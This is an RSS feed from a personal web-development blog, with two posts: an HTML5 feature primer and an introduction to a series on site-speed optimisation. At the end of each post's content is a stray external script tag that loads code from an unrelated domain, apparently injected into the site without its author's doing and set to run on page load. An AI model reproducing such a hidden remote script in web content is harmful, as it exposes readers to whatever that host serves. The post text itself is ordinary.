<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>headphono.us &#187; Webdesign</title>
	<atom:link href="http://headphono.us/category/webdesign/feed/" rel="self" type="application/rss+xml" />
	<link>http://headphono.us</link>
	<description>Pras Sarkar blogs about web technology, music, social networks, digital identities and other random things.</description>
	<lastBuildDate>Sat, 08 May 2010 17:42:38 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>HTML5 Primer and Comprehensive List of Features</title>
		<link>http://headphono.us/2010/04/17/html5-primer-and-comprehensive-list-of-features/</link>
		<comments>http://headphono.us/2010/04/17/html5-primer-and-comprehensive-list-of-features/#comments</comments>
		<pubDate>Sat, 17 Apr 2010 19:49:04 +0000</pubDate>
		<dc:creator>Pras Sarkar</dc:creator>
				<category><![CDATA[Webdesign]]></category>
		<category><![CDATA[Webdevelopment]]></category>
		<category><![CDATA[css3]]></category>
		<category><![CDATA[html5]]></category>

		<guid isPermaLink="false">http://headphono.us/?p=182</guid>
		<description><![CDATA[It&#8217;s hard to escape the recent chatter about HTML5 all over the development blogs. But it&#8217;s also hard to keep up with all the changes in HTML5. That&#8217;s where @edr&#8217;s amazingly concise and comprehensive list of HTML5 features comes in handy. If you&#8217;ve ever asked the question &#8220;What is HTML5?&#8221; or ever wanted to gain [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s hard to escape the recent chatter about HTML5 all over the development blogs. But it&#8217;s also hard to keep up with all the changes in HTML5. That&#8217;s where <a href="http://twitter.com/edr">@edr&#8217;s</a> amazingly <a href="http://apirocks.com/html5/html5.html">concise and comprehensive list of HTML5 features</a> comes in handy. If you&#8217;ve ever asked the question &#8220;What is HTML5?&#8221; or ever wanted to gain an overall understanding of HTML5 and what the changes mean for developers, this slide deck is essential for you.</p>
<p>Here&#8217;s a quick summary for those who don&#8217;t have the 10 mins to go through the slides:</p>
<h2>HTML5 ~= HTML + CSS + Javascript APIs</h2>
<h2>HTML</h2>
<ul>
<li><a href="http://apirocks.com/html5/html5.html#slide17">Semantics (New tags, Link Relations, Microdata)</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide20">Accessibility (ARIA roles)</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide21">Web Forms 2.0 (Input Fields)</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide22">Multimedia (Audio Tag, Video Tag)</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide23">2D and 3D drawing (Canvas, WebGL)</a></li>
</ul>
<h2>CSS</h2>
<ul>
<li><a href="http://apirocks.com/html5/html5.html#slide28">Selectors</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide29">Typography</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide30">Visuals</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide40">Transitions, transforms and animations</a></li>
</ul>
<h2>JS APIs</h2>
<ul>
<li><a href="http://apirocks.com/html5/html5.html#slide6">New Selectors</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide7">Client Side Storage (Web SQL Database, App Cache, Web Storage)</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide10">Communication (Web Sockets, Web Workers)</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide12">Desktop experience (Notifications, Drag and Drop API)</a></li>
<li><a href="http://apirocks.com/html5/html5.html#slide14">Geolocation</a></li>
</ul>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://headphono.us/2010/04/17/html5-primer-and-comprehensive-list-of-features/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to load your site faster: Introduction</title>
		<link>http://headphono.us/2007/04/29/how-to-load-your-site-faster-introduction/</link>
		<comments>http://headphono.us/2007/04/29/how-to-load-your-site-faster-introduction/#comments</comments>
		<pubDate>Mon, 30 Apr 2007 04:00:46 +0000</pubDate>
		<dc:creator>Pras Sarkar</dc:creator>
				<category><![CDATA[Optimization]]></category>
		<category><![CDATA[Webdesign]]></category>
		<category><![CDATA[Webdevelopment]]></category>

		<guid isPermaLink="false">http://headphono.us.s27219.gridserver.com/?p=26</guid>
		<description><![CDATA[Given my recent obsession with optimizing website load times recently, I felt the need to share my research findings. There are more ways than flavors at a gellato store, but fear not, I&#8217;ll try to condense them into a consumable chunk in the next few series of posts.
Here&#8217;s a rough breakdown of what I intend [...]]]></description>
			<content:encoded><![CDATA[<p>Given my recent obsession with optimizing website load times recently, I felt the need to share my research findings. There are more ways than flavors at a gellato store, but fear not, I&#8217;ll try to condense them into a consumable chunk in the next few series of posts.</p>
<p>Here&#8217;s a rough breakdown of what I intend to explore:</p>
<ol>
<li>HTTP Compression</li>
<li>Application level caching (PHP)</li>
<li>Client side requests optimization</li>
<li>Non-vital scripts optimization</li>
<li>Client side caching (i.e. browser caching)</li>
</ol>
<p>There&#8217;s a lot of neat tips and tricks out there, and I&#8217;ll try to post as much code and/or scripts that I can. I&#8217;ve used tactics from all the above topics in real world applications that I&#8217;ve been developing and the results have been very encouraging. On one particular site, using a combination of #1,#2 and #3, I went from an initial load time of 3.6 secs to 455ms (87% decrease).</p>
<p>Stay tuned for some good stuff.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://headphono.us/2007/04/29/how-to-load-your-site-faster-introduction/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic Page Served (once) in 1.599 seconds -->
